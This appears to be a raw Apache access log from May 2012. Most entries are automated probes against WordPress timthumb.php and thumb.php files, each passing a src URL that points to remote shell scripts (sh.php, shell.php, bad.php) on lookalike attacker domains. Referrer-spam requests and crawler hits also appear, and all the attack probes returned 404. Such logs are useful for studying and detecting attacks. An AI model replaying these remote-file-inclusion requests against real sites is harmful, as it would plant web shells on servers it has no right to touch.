78.137.37.171 - - [14/May/2012:00:49:39 +0200] "GET /logs/access_log HTTP/1.0" 200 24854 "http://playdooandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
78.137.37.171 - - [14/May/2012:00:49:40 +0200] "GET /logs/access_log HTTP/1.0" 200 25116 "http://playdooandroid.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
201.67.155.235 - - [14/May/2012:00:49:40 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:49:45 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.192.191.96 - - [14/May/2012:00:49:45 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.67.155.235 - - [14/May/2012:00:49:49 +0200] "GET /stats/index.html/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.53.171 - - [14/May/2012:00:49:50 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.53.171 - - [14/May/2012:00:49:51 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
83.169.45.9 - - [14/May/2012:00:49:53 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
83.169.45.9 - - [14/May/2012:00:49:53 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:54 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:55 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:55 +0200] "GET /stats//wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:55 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:55 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:49:56 +0200] "GET //wp-content/themes/modularity/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.143.234.27 - - [14/May/2012:00:51:05 +0200] "GET /stats/log.keys.html HTTP/1.0" 200 20219 "http://www.grupposeit.it/stats/log.keys.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)"
173.192.191.96 - - [14/May/2012:00:52:32 +0200] "GET /logs/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.238 - - [14/May/2012:00:52:36 +0200] "GET /logs/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:00:53:07 +0200] "GET /stats//wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:00:53:08 +0200] "GET //wp-content/themes/forewordthinking/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.137.37.171 - - [14/May/2012:00:53:09 +0200] "GET /logs/access_log HTTP/1.0" 200 30174 "http://playdooandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.137.37.171 - - [14/May/2012:00:53:10 +0200] "GET /logs/access_log HTTP/1.0" 200 30424 "http://playdooandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
78.137.37.171 - - [14/May/2012:00:53:10 +0200] "GET /logs/access_log HTTP/1.0" 200 30621 "http://playdooandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
67.228.195.2 - - [14/May/2012:00:53:11 +0200] "GET /stats//wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:00:53:11 +0200] "GET /logs/access_log HTTP/1.0" 200 30862 "http://playdooandroid.info/sitemap224.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
78.137.37.171 - - [14/May/2012:00:53:11 +0200] "GET /logs/access_log HTTP/1.0" 200 31306 "http://playdooandroid.info/sitemap224.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
67.228.195.2 - - [14/May/2012:00:53:13 +0200] "GET /stats//wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:00:53:15 +0200] "GET //wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:00:53:20 +0200] "GET //wp-content/themes/TidalForce/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.23.53.171 - - [14/May/2012:00:53:39 +0200] "GET /logs/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
83.169.45.9 - - [14/May/2012:00:54:18 +0200] "GET /logs/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.228.180.218 - - [14/May/2012:00:55:53 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
94.228.180.218 - - [14/May/2012:00:55:53 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
94.228.180.218 - - [14/May/2012:00:55:53 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
78.137.37.171 - - [14/May/2012:00:56:38 +0200] "GET /logs/access_log HTTP/1.0" 200 33214 "http://playdooandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
78.137.37.171 - - [14/May/2012:00:56:39 +0200] "GET /logs/access_log HTTP/1.0" 200 33411 "http://playdooandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))"
78.137.37.171 - - [14/May/2012:00:56:39 +0200] "GET /logs/access_log HTTP/1.0" 200 33642 "http://playdooandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)"
78.137.37.171 - - [14/May/2012:00:56:40 +0200] "GET /logs/access_log HTTP/1.0" 200 33842 "http://playdooandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; APC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50215; InfoPath.1)"
78.137.37.171 - - [14/May/2012:00:56:40 +0200] "GET /logs/access_log HTTP/1.0" 200 34104 "http://playdooandroid.info/sitemap231.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
217.69.134.91 - - [14/May/2012:00:57:02 +0200] "GET / HTTP/1.0" 200 945 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0)"
216.69.224.11 - - [14/May/2012:00:57:08 +0200] "GET /stats/wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 335 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:08 +0200] "GET /stats/wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 335 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:09 +0200] "GET /stats/wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 332 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:09 +0200] "GET /stats/wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 332 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:10 +0200] "GET /stats/wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 335 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:10 +0200] "GET /stats/wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 332 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:12 +0200] "GET /wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 329 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:12 +0200] "GET /wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 329 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:13 +0200] "GET /wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/lin.php HTTP/1.1" 404 326 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:13 +0200] "GET /wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 326 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:14 +0200] "GET /wp-content/themes/Polished/scripts/timthumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 329 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.69.224.11 - - [14/May/2012:00:57:14 +0200] "GET /wp-content/themes/Polished/scripts/thumb.php?src=http://picasa.com.hidro-ronda.com/nina.php HTTP/1.1" 404 326 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
95.132.213.162 - - [14/May/2012:00:57:20 +0200] "GET /logs/access_log HTTP/1.0" 200 36944 "http://androideosoft.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
95.132.213.162 - - [14/May/2012:00:57:25 +0200] "GET /logs/access_log HTTP/1.0" 200 37131 "http://androideosoft.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
95.132.213.162 - - [14/May/2012:00:57:29 +0200] "GET /logs/access_log HTTP/1.0" 200 37372 "http://androideosoft.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
94.228.180.218 - - [14/May/2012:00:57:31 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
94.228.180.218 - - [14/May/2012:00:57:31 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
95.132.213.162 - - [14/May/2012:00:57:30 +0200] "GET /logs/access_log HTTP/1.0" 200 37559 "http://androideosoft.info/sitemap238.html" "Opera/8.00 (Windows NT 5.1; U; en)"
94.228.180.218 - - [14/May/2012:00:57:31 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
95.132.213.162 - - [14/May/2012:00:57:31 +0200] "GET /logs/access_log HTTP/1.0" 200 38176 "http://androideosoft.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]"
95.173.163.104 - - [14/May/2012:00:58:04 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:06 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:07 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:08 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
107.22.112.80 - - [14/May/2012:00:58:11 +0200] "GET /stats/log.keys.html HTTP/1.1" 200 20219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC"
50.47.58.114 - - [14/May/2012:00:58:20 +0200] "GET /stats//wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
50.47.58.114 - - [14/May/2012:00:58:21 +0200] "GET //wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows;U;Windows NT 5.1; l-PL;rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4"
89.33.197.242 - - [14/May/2012:00:58:39 +0200] "GET /stats//wp-content/themes/DeepFocus/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:58:39 +0200] "GET /stats//wp-content/themes/DeepFocus/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:58:40 +0200] "GET /stats//wp-content/themes/DeepFocus/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:58:40 +0200] "GET //wp-content/themes/DeepFocus/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:58:40 +0200] "GET //wp-content/themes/DeepFocus/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:00:58:40 +0200] "GET //wp-content/themes/DeepFocus/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.173.163.104 - - [14/May/2012:00:58:52 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:53 +0200] "GET /stats//wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:55 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.173.163.104 - - [14/May/2012:00:58:56 +0200] "GET //wp-content/themes/cinch/functions/thumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
187.2.136.26 - - [14/May/2012:00:59:00 +0200] "GET /stats/log.keys.html HTTP/1.0" 200 20219 "http://www.grupposeit.it/stats/log.keys.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:"
66.249.72.34 - - [14/May/2012:00:59:33 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.34 - - [14/May/2012:00:59:33 +0200] "GET /logs HTTP/1.1" 301 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.67.155.235 - - [14/May/2012:00:59:52 +0200] "GET /stats/wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
201.67.155.235 - - [14/May/2012:00:59:53 +0200] "GET /wp-content/themes/striking/includes/timthumb.php?src=http://picasa.com.moveissantafe.com/yahoo.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:01:00:08 +0200] "GET /logs/access_log HTTP/1.0" 200 43768 "http://playdooandroid.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))"
78.137.37.171 - - [14/May/2012:01:00:09 +0200] "GET /logs/access_log HTTP/1.0" 200 43999 "http://playdooandroid.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)"
78.137.37.171 - - [14/May/2012:01:00:09 +0200] "GET /logs/access_log HTTP/1.0" 200 44195 "http://playdooandroid.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
78.137.37.171 - - [14/May/2012:01:00:10 +0200] "GET /logs/access_log HTTP/1.0" 200 44388 "http://playdooandroid.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
78.137.37.171 - - [14/May/2012:01:00:10 +0200] "GET /logs/access_log HTTP/1.0" 200 44576 "http://playdooandroid.info/sitemap238.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows ME) Opera 7.11 [en]"
77.92.147.168 - - [14/May/2012:01:00:35 +0200] "GET /stats/wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
77.92.147.168 - - [14/May/2012:01:00:36 +0200] "GET /stats/wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
77.92.147.168 - - [14/May/2012:01:00:37 +0200] "GET /wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/x.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
77.92.147.168 - - [14/May/2012:01:00:38 +0200] "GET /wp-content/themes/Cion/timthumb.php?src=http://picasa.com.kereny.ro/go.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:01:43 +0200] "GET /stats//wp-content/themes/abstract/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:01:45 +0200] "GET /stats//wp-content/themes/abstract/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:01:46 +0200] "GET //wp-content/themes/abstract/thumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:01:01:47 +0200] "GET //wp-content/themes/abstract/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
46.45.138.202 - - [14/May/2012:01:02:55 +0200] "GET /stats/log.keys.html//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:02:57 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:02:58 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:01:03:00 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:03 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:03 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:03 +0200] "GET /stats//wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:04 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:01:03:04 +0200] "GET //wp-content/themes/business-turnkey/assets/js/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
